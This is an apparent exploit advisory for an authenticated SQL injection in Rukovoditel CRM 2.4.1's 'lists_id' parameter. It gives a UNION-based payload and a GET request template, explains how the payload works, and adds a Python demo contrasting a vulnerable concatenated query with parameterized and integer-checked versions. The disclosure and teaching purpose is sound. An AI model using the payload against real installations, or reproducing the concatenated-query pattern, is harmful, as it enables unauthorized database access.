Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection

2019.01.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection
# Dork: N/A
# Date: 27-01-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A

# Software Description:
Rukovoditel is a free, web-based, open-source project management application. Unlike traditional project management tools, it gives users a broader and more extensive approach to project management: its customization options let users create additional entities, define the relationships between them, and generate the reports they need.

# Vulnerabilities
The SQL injection requires an authenticated user. After logging in, go to the Application structure screen, open the Global lists tab and use the "Add new value" button to create a new list. The injection is then applied through the lists_id parameter of the generated list. Screenshots of the weakness:
https://i.hizliresim.com/nQJZm5.jpg
https://i.hizliresim.com/WqGmEQ.jpg

# POC - SQLi
# Parameter: lists_id=1 (string)
# Attack Pattern: -1'+union+select+1,2--+
# GET Request: http://localhost/[PATH]/index.php?module=global_lists/choices&lists_id=1'[SQL]

Note on the attack pattern: the `+` characters are URL-encoded spaces, so the application receives `-1' union select 1,2-- `. The trailing space after `--` is what makes MySQL treat the rest of the line (the closing quote the application appends) as a comment, and the two-column `union select 1,2` implies the underlying query selects two columns. The `-1` ensures the original WHERE clause matches nothing, so only the attacker-controlled row comes back.
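To make the mechanics of this bug class concrete, the following is an added example, not code from the advisory or from Rukovoditel. It reproduces the pattern against an in-memory SQLite table: the table name, column names and the exact shape of the WHERE clause are assumptions, and the rows are constructed for the example. It shows the advisory's payload being URL-decoded, spliced into a concatenated query, and returning an attacker-chosen row, then shows the same input against a parameterized query and against integer validation (the PHP `(int)` cast idiom), both of which neutralize it.

```python
import sqlite3
from urllib.parse import unquote_plus

# Attack pattern exactly as given in the advisory (URL-encoded; '+' is a space).
PAYLOAD = "-1'+union+select+1,2--+"


def seed_db() -> sqlite3.Connection:
    """Build a throwaway in-memory table. Schema and rows are constructed for
    this example; they are not Rukovoditel's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE choices (id INTEGER, lists_id INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO choices VALUES (?, ?, ?)",
        [(1, 1, "Open"), (2, 1, "Closed"), (3, 2, "High")],
    )
    return conn


def build_vulnerable_sql(lists_id: str) -> str:
    """String-concatenates the request parameter into the WHERE clause,
    which is the defect class the advisory reports (hypothetical query shape)."""
    return "SELECT id, name FROM choices WHERE lists_id='" + lists_id + "'"


def vulnerable_query(conn, lists_id: str):
    """Runs the concatenated query; the payload turns it into a UNION."""
    return conn.execute(build_vulnerable_sql(lists_id)).fetchall()


def safe_query(conn, lists_id: str):
    """Bound parameter: the whole value is compared as a single literal,
    so the quote, UNION and comment never reach the SQL parser."""
    return conn.execute(
        "SELECT id, name FROM choices WHERE lists_id=?", (lists_id,)
    ).fetchall()


def safe_query_int(conn, lists_id: str):
    """Stricter: lists_id is a numeric identifier, so reject anything that is
    not an integer before the query is even built. Returns None on rejection."""
    try:
        value = int(lists_id)
    except ValueError:
        return None
    return conn.execute(
        "SELECT id, name FROM choices WHERE lists_id=?", (value,)
    ).fetchall()


if __name__ == "__main__":
    conn = seed_db()
    decoded = unquote_plus(PAYLOAD)
    print("decoded payload :", repr(decoded))
    print("spliced SQL     :", build_vulnerable_sql(decoded))
    print("vulnerable      :", vulnerable_query(conn, decoded))
    print("parameterized   :", safe_query(conn, decoded))
    print("int-validated   :", safe_query_int(conn, decoded))
```

Against the concatenated query the decoded payload yields the row `(1, 2)`, i.e. the attacker's `select 1,2` replaced the list's real choices; swapping the literals for column names is the usual next step in a real test. The parameterized query returns nothing because `lists_id` is compared with the entire string, and the integer check rejects the request outright, which is the right fix for an identifier parameter.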


Copyright 2019, cxsecurity.com
